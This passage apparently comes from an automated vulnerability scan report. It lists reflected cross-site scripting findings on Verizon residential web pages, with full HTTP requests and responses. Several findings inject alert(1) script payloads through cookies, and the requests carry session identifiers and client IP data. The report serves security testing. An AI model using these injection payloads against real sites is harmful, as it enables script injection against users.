Cookie: amlbcookie=05; SMSESSION=LOGGEDOFF; RecentlyVisitedOffers=fios_fiftv_dp,FiOS Double Play,69.99*/^; AprURL=https%3A%2F%2Fessentialsandextras.verizon.com%3A443%2Fapp-cust-selfservices%2Fmyvz%2Fbuy.do%3Foid%3DVX210; canigetfios=Y; dotcomsid=bab89"-alert(1)-"05b4fbb714d; vzinhomeagent=GUID=YgBkADAAMABmADAAMwA0AC0ANwAyAGUAOQAtADQANgBkADcALQA4ADcAMgAxAC0AOABjADcAOAA3ADEAOAA5ADgAMQAxAGUA&Auth=bgBvAA==&CaptchaAuth=bgBvAA==&Trans=PABUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4AMwA5ADQAMwA2ADAAMAA8AC8AVAByAGEAbgBzAGEAYwB0AGkAbwBuAEkAZAA+AA==&IsFoundAck=ZgBhAGwAcwBlAA==&Key=VwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA=&Input=PABVAHMAZQByAFQAZQB4AHQAPgA8AFQAZQB4AHQAUgBlAGYAZQByAGUAbgBjAGUAPgBLAGUAeQBXAG8AcgBkADwALwBUAGUAeAB0AFIAZQBmAGUAcgBlAG4AYwBlAD4APABUAGUAeAB0AD4AVwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA8AC8AVABlAHgAdAA+ADwALwBVAHMAZQByAFQAZQB4AHQAPgA=&AccountIDAuthMode=bgBvAA==; ASPSESSIONIDSABSSSST=HHHPAFBDPIGAFLDEMCPHAODD; op629myverizongum=a01502v07o26bkl00b6l5126bkl00k6ns7d46; autosuggest=on; BPSPANISH=N; PDSS=PflowId=a7a49eba9a20412b8ff824542165515c; ContextInfo_Internet=HighSpeed; UserSystemInfo=browser=QQBwAHAAbABlAE0AQQBDAC0AUwBhAGYAYQByAGkAQQBTAFAALgBzAGUAcgB2AGkAYwBlAF8AYQBzAHAAeAAgADUALgAwAA==&os=IABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEA&IP=MQA3ADQALgAxADIAMgAuADIAMwAuADIAMQA4ACwAIAAyADAANAAuADIALgAyADEANQAuADEANAA3ACwAIAAxADEAMgAuADYANAAuADEALgAxADAANwA=; ak-sf=false; CMS_TimeZoneOffset=360; ActualProtectedResource=https://essentialsandextras.verizon.com:443/app-cust-selfservices/myvz/buy.do?oid=VX210; Product=A; VzApps=STATE=TX; ProductXML=A; IHAClientIP=112.64.2.103; LOB_CATEGORY=; ASPSESSIONIDAACQSSTQ=HFFMAEHCEIGODAGPDJIINHAB; Source=CHSI; CustTrackPage=GHP; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6f845525d5f4f58455e445a4a423660; DSS=flowId=ee5115194db84b9b9834c670b1ec6451; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASPSESSIONIDSQAQATBB=KMLLKLLAMEBBDHEPMGMLIECK; NSC_xxx22_tqmbu_mcw=ffffffffa54c16ce45525d5f4f58455e445a4a423660; RecentlyVisited=Verizon%2520%257C%2520Local%2520%2526%2520Long%2520Distance%2520Phone@http%253A//www22.verizon.com/residentialhelp/phone%23Verizon%2520%257C%2520High%2520Speed%2520Internet%2520-%2520What%2520is%2520Verizon%2520Your%2520Domain%253F@http%253A//www22.verizon.com/ResidentialHelp/HighSpeed/Email/Setup+And+Use/QuestionsOne/121547.htm%23; CenterSelected=0; showpromo=Y; vzpers=STATE=TX; NSC_xxx22_gzi_wasfqbjs_mcw=ffffffff895bc6de45525d5f4f58455e445a4a423660; refURL=http://www22.verizon.com/terms/; ASPSESSIONIDCSBCCATB=AMIFEODCEAGLGPHFECKFJCGD; lob=consumer; WT_FPC=id=25c0e3eb152dc13a7901290217656258:lv=1290218421002:ss=1290217656258; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69145525d5f4f58455e445a4a42366a; BusinessUnit=business; ECSPCookies=Partner=VZO&SolutionCenter=Phone&OOFState=&SupportCenter=&Internet=HighSpeed&TV=&Wireless=; ASPSESSIONIDQSBQBTBA=KLLAJDLAFLAJOEADIMAPCNBB; V347=CT-2; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; ASP.NET_SessionId=xssjr145hgrtk055l4w5jujb; VZGEO=west; RegistrationApp=SessionId=8d2315d0-c961-442f-b3ac-b606fe73e7e0; vzapps=STATE=TX; ReferralSitenet=http://webmail.verizon.net/signin/login.jsp?src=sam&err=1011; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; ASPSESSIONIDQSTCSSQS=LAJBKCHCFNBNOOFMIPDPEDIH; vzAppID=; op629myverizonliid=a01502v07o26bkl00b6l5126bkl00k6ns7d46; myservices=vzdock=N; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 79207
Expires: Sat, 20 Nov 2010 03:26:55 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 03:26:55 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 03:26:55 GMT; path=/
Set-Cookie: ContextInfo_State=TX; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 03:26:55 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 03:26:55 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 03:26:55 GMT; path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<script type="text/javascript">
function startmenu()
{
}
var mvzOptIn="N";
var strdotcomval = "bab89"-alert(1)-"05b4fbb714d"
if(mvzOptIn != 'Y' || strdotcomval == "")
{
    var m_view = new VZT.MasterNavView();
    var m_model = {container: document.getElementB
...[SNIP]...

2.950. http://www22.verizon.com/Residential/aboutFiOS/reviews/reviews.htm [vzapps cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /Residential/aboutFiOS/reviews/reviews.htm

Issue detail

The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 26326'><script>alert(1)</script>0d04466e0c9 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/aboutFiOS/reviews/reviews.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Source=CHSI; vzapps=STATE=TX26326'><script>alert(1)</script>0d04466e0c9; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 73429
Expires: Sat, 20 Nov 2010 00:12:51 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 00:12:51 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:12:51 GMT; path=/
Set-Cookie: ContextInfo_State=TX26326'><script>alert(1)</script>0d04466e0c9; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:12:51 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:12:51 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:12:51 GMT; path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<input type='hidden' id='locationInfo' value='TX26326'><SCRIPT>ALERT(1)</SCRIPT>0D04466E0C9 ' />
...[SNIP]...

2.951. http://www22.verizon.com/Residential/aboutFiOS/widgets/ [VzApps cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /Residential/aboutFiOS/widgets/

Issue detail

The value of the VzApps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload eb7c2'><script>alert(1)</script>45fe6a738c2 was submitted in the VzApps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/aboutFiOS/widgets/ HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: amlbcookie=05; SMSESSION=LOGGEDOFF; RecentlyVisitedOffers=fios_fiftv_dp,FiOS Double Play,69.99*/^; AprURL=https%3A%2F%2Fessentialsandextras.verizon.com%3A443%2Fapp-cust-selfservices%2Fmyvz%2Fbuy.do%3Foid%3DVX210; canigetfios=Y; dotcomsid=; vzinhomeagent=GUID=YgBkADAAMABmADAAMwA0AC0ANwAyAGUAOQAtADQANgBkADcALQA4ADcAMgAxAC0AOABjADcAOAA3ADEAOAA5ADgAMQAxAGUA&Auth=bgBvAA==&CaptchaAuth=bgBvAA==&Trans=PABUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4AMwA5ADQAMwA2ADAAMAA8AC8AVAByAGEAbgBzAGEAYwB0AGkAbwBuAEkAZAA+AA==&IsFoundAck=ZgBhAGwAcwBlAA==&Key=VwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA=&Input=PABVAHMAZQByAFQAZQB4AHQAPgA8AFQAZQB4AHQAUgBlAGYAZQByAGUAbgBjAGUAPgBLAGUAeQBXAG8AcgBkADwALwBUAGUAeAB0AFIAZQBmAGUAcgBlAG4AYwBlAD4APABUAGUAeAB0AD4AVwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA8AC8AVABlAHgAdAA+ADwALwBVAHMAZQByAFQAZQB4AHQAPgA=&AccountIDAuthMode=bgBvAA==; ASPSESSIONIDSABSSSST=HHHPAFBDPIGAFLDEMCPHAODD; op629myverizongum=a01502v07o26bkl00b6l5126bkl00k6ns7d46; autosuggest=on; BPSPANISH=N; PDSS=PflowId=a7a49eba9a20412b8ff824542165515c; ContextInfo_Internet=HighSpeed; UserSystemInfo=browser=QQBwAHAAbABlAE0AQQBDAC0AUwBhAGYAYQByAGkAQQBTAFAALgBzAGUAcgB2AGkAYwBlAF8AYQBzAHAAeAAgADUALgAwAA==&os=IABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEA&IP=MQA3ADQALgAxADIAMgAuADIAMwAuADIAMQA4ACwAIAAyADAANAAuADIALgAyADEANQAuADEANAA3ACwAIAAxADEAMgAuADYANAAuADEALgAxADAANwA=; ak-sf=false; CMS_TimeZoneOffset=360; ActualProtectedResource=https://essentialsandextras.verizon.com:443/app-cust-selfservices/myvz/buy.do?oid=VX210; Product=A; VzApps=STATE=TXeb7c2'><script>alert(1)</script>45fe6a738c2; ProductXML=A; IHAClientIP=112.64.2.103; LOB_CATEGORY=; ASPSESSIONIDAACQSSTQ=HFFMAEHCEIGODAGPDJIINHAB; Source=CHSI; CustTrackPage=GHP; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6f845525d5f4f58455e445a4a423660; DSS=flowId=ee5115194db84b9b9834c670b1ec6451; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASPSESSIONIDSQAQATBB=KMLLKLLAMEBBDHEPMGMLIECK; NSC_xxx22_tqmbu_mcw=ffffffffa54c16ce45525d5f4f58455e445a4a423660; RecentlyVisited=Verizon%2520%257C%2520Local%2520%2526%2520Long%2520Distance%2520Phone@http%253A//www22.verizon.com/residentialhelp/phone%23Verizon%2520%257C%2520High%2520Speed%2520Internet%2520-%2520What%2520is%2520Verizon%2520Your%2520Domain%253F@http%253A//www22.verizon.com/ResidentialHelp/HighSpeed/Email/Setup+And+Use/QuestionsOne/121547.htm%23; CenterSelected=0; showpromo=Y; vzpers=STATE=TX; NSC_xxx22_gzi_wasfqbjs_mcw=ffffffff895bc6de45525d5f4f58455e445a4a423660; refURL=http://www22.verizon.com/terms/; ASPSESSIONIDCSBCCATB=AMIFEODCEAGLGPHFECKFJCGD; lob=consumer; WT_FPC=id=25c0e3eb152dc13a7901290217656258:lv=1290218421002:ss=1290217656258; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69145525d5f4f58455e445a4a42366a; BusinessUnit=business; ECSPCookies=Partner=VZO&SolutionCenter=Phone&OOFState=&SupportCenter=&Internet=HighSpeed&TV=&Wireless=; ASPSESSIONIDQSBQBTBA=KLLAJDLAFLAJOEADIMAPCNBB; V347=CT-2; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; ASP.NET_SessionId=xssjr145hgrtk055l4w5jujb; VZGEO=west; RegistrationApp=SessionId=8d2315d0-c961-442f-b3ac-b606fe73e7e0; vzapps=STATE=TX; ReferralSitenet=http://webmail.verizon.net/signin/login.jsp?src=sam&err=1011; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; ASPSESSIONIDQSTCSSQS=LAJBKCHCFNBNOOFMIPDPEDIH; vzAppID=; op629myverizonliid=a01502v07o26bkl00b6l5126bkl00k6ns7d46; myservices=vzdock=N; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 73612
Expires: Sat, 20 Nov 2010 03:26:22 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 03:26:22 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 03:26:22 GMT; path=/
Set-Cookie: ContextInfo_State=TXeb7c2'><script>alert(1)</script>45fe6a738c2; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 03:26:22 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 03:26:22 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 03:26:22 GMT; path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<input type='hidden' id='locationInfo' value='TXEB7C2'><SCRIPT>ALERT(1)</SCRIPT>45FE6A738C2 ' />
...[SNIP]...

2.952. http://www22.verizon.com/Residential/aboutFiOS/widgets/ [dotcomsid cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /Residential/aboutFiOS/widgets/

Issue detail

The value of the dotcomsid cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a5a5b"-alert(1)-"404ef5be42d was submitted in the dotcomsid cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Residential/aboutFiOS/widgets/ HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: amlbcookie=05; SMSESSION=LOGGEDOFF; RecentlyVisitedOffers=fios_fiftv_dp,FiOS Double Play,69.99*/^; AprURL=https%3A%2F%2Fessentialsandextras.verizon.com%3A443%2Fapp-cust-selfservices%2Fmyvz%2Fbuy.do%3Foid%3DVX210; canigetfios=Y; dotcomsid=a5a5b"-alert(1)-"404ef5be42d; vzinhomeagent=GUID=YgBkADAAMABmADAAMwA0AC0ANwAyAGUAOQAtADQANgBkADcALQA4ADcAMgAxAC0AOABjADcAOAA3ADEAOAA5ADgAMQAxAGUA&Auth=bgBvAA==&CaptchaAuth=bgBvAA==&Trans=PABUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4AMwA5ADQAMwA2ADAAMAA8AC8AVAByAGEAbgBzAGEAYwB0AGkAbwBuAEkAZAA+AA==&IsFoundAck=ZgBhAGwAcwBlAA==&Key=VwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA=&Input=PABVAHMAZQByAFQAZQB4AHQAPgA8AFQAZQB4AHQAUgBlAGYAZQByAGUAbgBjAGUAPgBLAGUAeQBXAG8AcgBkADwALwBUAGUAeAB0AFIAZQBmAGUAcgBlAG4AYwBlAD4APABUAGUAeAB0AD4AVwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA8AC8AVABlAHgAdAA+ADwALwBVAHMAZQByAFQAZQB4AHQAPgA=&AccountIDAuthMode=bgBvAA==; ASPSESSIONIDSABSSSST=HHHPAFBDPIGAFLDEMCPHAODD; op629myverizongum=a01502v07o26bkl00b6l5126bkl00k6ns7d46; autosuggest=on; BPSPANISH=N; PDSS=PflowId=a7a49eba9a20412b8ff824542165515c; ContextInfo_Internet=HighSpeed; UserSystemInfo=browser=QQBwAHAAbABlAE0AQQBDAC0AUwBhAGYAYQByAGkAQQBTAFAALgBzAGUAcgB2AGkAYwBlAF8AYQBzAHAAeAAgADUALgAwAA==&os=IABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEA&IP=MQA3ADQALgAxADIAMgAuADIAMwAuADIAMQA4ACwAIAAyADAANAAuADIALgAyADEANQAuADEANAA3ACwAIAAxADEAMgAuADYANAAuADEALgAxADAANwA=; ak-sf=false; CMS_TimeZoneOffset=360; ActualProtectedResource=https://essentialsandextras.verizon.com:443/app-cust-selfservices/myvz/buy.do?oid=VX210; Product=A; VzApps=STATE=TX; ProductXML=A; IHAClientIP=112.64.2.103; LOB_CATEGORY=; ASPSESSIONIDAACQSSTQ=HFFMAEHCEIGODAGPDJIINHAB; Source=CHSI; CustTrackPage=GHP; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6f845525d5f4f58455e445a4a423660; DSS=flowId=ee5115194db84b9b9834c670b1ec6451; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASPSESSIONIDSQAQATBB=KMLLKLLAMEBBDHEPMGMLIECK; NSC_xxx22_tqmbu_mcw=ffffffffa54c16ce45525d5f4f58455e445a4a423660; RecentlyVisited=Verizon%2520%257C%2520Local%2520%2526%2520Long%2520Distance%2520Phone@http%253A//www22.verizon.com/residentialhelp/phone%23Verizon%2520%257C%2520High%2520Speed%2520Internet%2520-%2520What%2520is%2520Verizon%2520Your%2520Domain%253F@http%253A//www22.verizon.com/ResidentialHelp/HighSpeed/Email/Setup+And+Use/QuestionsOne/121547.htm%23; CenterSelected=0; showpromo=Y; vzpers=STATE=TX; NSC_xxx22_gzi_wasfqbjs_mcw=ffffffff895bc6de45525d5f4f58455e445a4a423660; refURL=http://www22.verizon.com/terms/; ASPSESSIONIDCSBCCATB=AMIFEODCEAGLGPHFECKFJCGD; lob=consumer; WT_FPC=id=25c0e3eb152dc13a7901290217656258:lv=1290218421002:ss=1290217656258; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69145525d5f4f58455e445a4a42366a; BusinessUnit=business; ECSPCookies=Partner=VZO&SolutionCenter=Phone&OOFState=&SupportCenter=&Internet=HighSpeed&TV=&Wireless=; ASPSESSIONIDQSBQBTBA=KLLAJDLAFLAJOEADIMAPCNBB; V347=CT-2; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; ASP.NET_SessionId=xssjr145hgrtk055l4w5jujb; VZGEO=west; RegistrationApp=SessionId=8d2315d0-c961-442f-b3ac-b606fe73e7e0; vzapps=STATE=TX; ReferralSitenet=http://webmail.verizon.net/signin/login.jsp?src=sam&err=1011; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; ASPSESSIONIDQSTCSSQS=LAJBKCHCFNBNOOFMIPDPEDIH; vzAppID=; op629myverizonliid=a01502v07o26bkl00b6l5126bkl00k6ns7d46; myservices=vzdock=N; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 79392
Expires: Sat, 20 Nov 2010 03:26:14 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 03:26:14 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 03:26:13 GMT; path=/
Set-Cookie: ContextInfo_State=TX; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 03:26:13 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 03:26:13 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 03:26:13 GMT; path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<script type="text/javascript">
function startmenu()
{
}
var mvzOptIn="N";
var strdotcomval = "a5a5b"-alert(1)-"404ef5be42d"
if(mvzOptIn != 'Y' || strdotcomval == "")
{
    var m_view = new VZT.MasterNavView();
    var m_model = {container: document.getElementB
...[SNIP]...

2.953. http://www22.verizon.com/Residential/aboutFiOS/widgets/widgets.htm [VzApps cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /Residential/aboutFiOS/widgets/widgets.htm

Issue detail

The value of the VzApps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload dd694'><script>alert(1)</script>d30db65d4d8 was submitted in the VzApps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/aboutFiOS/widgets/widgets.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: amlbcookie=05; SMSESSION=LOGGEDOFF; RecentlyVisitedOffers=fios_fiftv_dp,FiOS Double Play,69.99*/^; AprURL=https%3A%2F%2Fessentialsandextras.verizon.com%3A443%2Fapp-cust-selfservices%2Fmyvz%2Fbuy.do%3Foid%3DVX210; canigetfios=Y; dotcomsid=; vzinhomeagent=GUID=YgBkADAAMABmADAAMwA0AC0ANwAyAGUAOQAtADQANgBkADcALQA4ADcAMgAxAC0AOABjADcAOAA3ADEAOAA5ADgAMQAxAGUA&Auth=bgBvAA==&CaptchaAuth=bgBvAA==&Trans=PABUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4AMwA5ADQAMwA2ADAAMAA8AC8AVAByAGEAbgBzAGEAYwB0AGkAbwBuAEkAZAA+AA==&IsFoundAck=ZgBhAGwAcwBlAA==&Key=VwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA=&Input=PABVAHMAZQByAFQAZQB4AHQAPgA8AFQAZQB4AHQAUgBlAGYAZQByAGUAbgBjAGUAPgBLAGUAeQBXAG8AcgBkADwALwBUAGUAeAB0AFIAZQBmAGUAcgBlAG4AYwBlAD4APABUAGUAeAB0AD4AVwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA8AC8AVABlAHgAdAA+ADwALwBVAHMAZQByAFQAZQB4AHQAPgA=&AccountIDAuthMode=bgBvAA==; ASPSESSIONIDSABSSSST=HHHPAFBDPIGAFLDEMCPHAODD; op629myverizongum=a01502v07o26bkl00b6l5126bkl00k6ns7d46; autosuggest=on; BPSPANISH=N; PDSS=PflowId=a7a49eba9a20412b8ff824542165515c; ContextInfo_Internet=HighSpeed; UserSystemInfo=browser=QQBwAHAAbABlAE0AQQBDAC0AUwBhAGYAYQByAGkAQQBTAFAALgBzAGUAcgB2AGkAYwBlAF8AYQBzAHAAeAAgADUALgAwAA==&os=IABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEA&IP=MQA3ADQALgAxADIAMgAuADIAMwAuADIAMQA4ACwAIAAyADAANAAuADIALgAyADEANQAuADEANAA3ACwAIAAxADEAMgAuADYANAAuADEALgAxADAANwA=; ak-sf=false; CMS_TimeZoneOffset=360; ActualProtectedResource=https://essentialsandextras.verizon.com:443/app-cust-selfservices/myvz/buy.do?oid=VX210; Product=A; VzApps=STATE=TXdd694'><script>alert(1)</script>d30db65d4d8; ProductXML=A; IHAClientIP=112.64.2.103; LOB_CATEGORY=; ASPSESSIONIDAACQSSTQ=HFFMAEHCEIGODAGPDJIINHAB; Source=CHSI; CustTrackPage=GHP; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6f845525d5f4f58455e445a4a423660; DSS=flowId=ee5115194db84b9b9834c670b1ec6451; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASPSESSIONIDSQAQATBB=KMLLKLLAMEBBDHEPMGMLIECK; NSC_xxx22_tqmbu_mcw=ffffffffa54c16ce45525d5f4f58455e445a4a423660; RecentlyVisited=Verizon%2520%257C%2520Local%2520%2526%2520Long%2520Distance%2520Phone@http%253A//www22.verizon.com/residentialhelp/phone%23Verizon%2520%257C%2520High%2520Speed%2520Internet%2520-%2520What%2520is%2520Verizon%2520Your%2520Domain%253F@http%253A//www22.verizon.com/ResidentialHelp/HighSpeed/Email/Setup+And+Use/QuestionsOne/121547.htm%23; CenterSelected=0; showpromo=Y; vzpers=STATE=TX; NSC_xxx22_gzi_wasfqbjs_mcw=ffffffff895bc6de45525d5f4f58455e445a4a423660; refURL=http://www22.verizon.com/terms/; ASPSESSIONIDCSBCCATB=AMIFEODCEAGLGPHFECKFJCGD; lob=consumer; WT_FPC=id=25c0e3eb152dc13a7901290217656258:lv=1290218421002:ss=1290217656258; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69145525d5f4f58455e445a4a42366a; BusinessUnit=business; ECSPCookies=Partner=VZO&SolutionCenter=Phone&OOFState=&SupportCenter=&Internet=HighSpeed&TV=&Wireless=; ASPSESSIONIDQSBQBTBA=KLLAJDLAFLAJOEADIMAPCNBB; V347=CT-2; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; ASP.NET_SessionId=xssjr145hgrtk055l4w5jujb; VZGEO=west; RegistrationApp=SessionId=8d2315d0-c961-442f-b3ac-b606fe73e7e0; vzapps=STATE=TX; ReferralSitenet=http://webmail.verizon.net/signin/login.jsp?src=sam&err=1011; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; ASPSESSIONIDQSTCSSQS=LAJBKCHCFNBNOOFMIPDPEDIH; vzAppID=; op629myverizonliid=a01502v07o26bkl00b6l5126bkl00k6ns7d46; myservices=vzdock=N; CP=null*;

Response

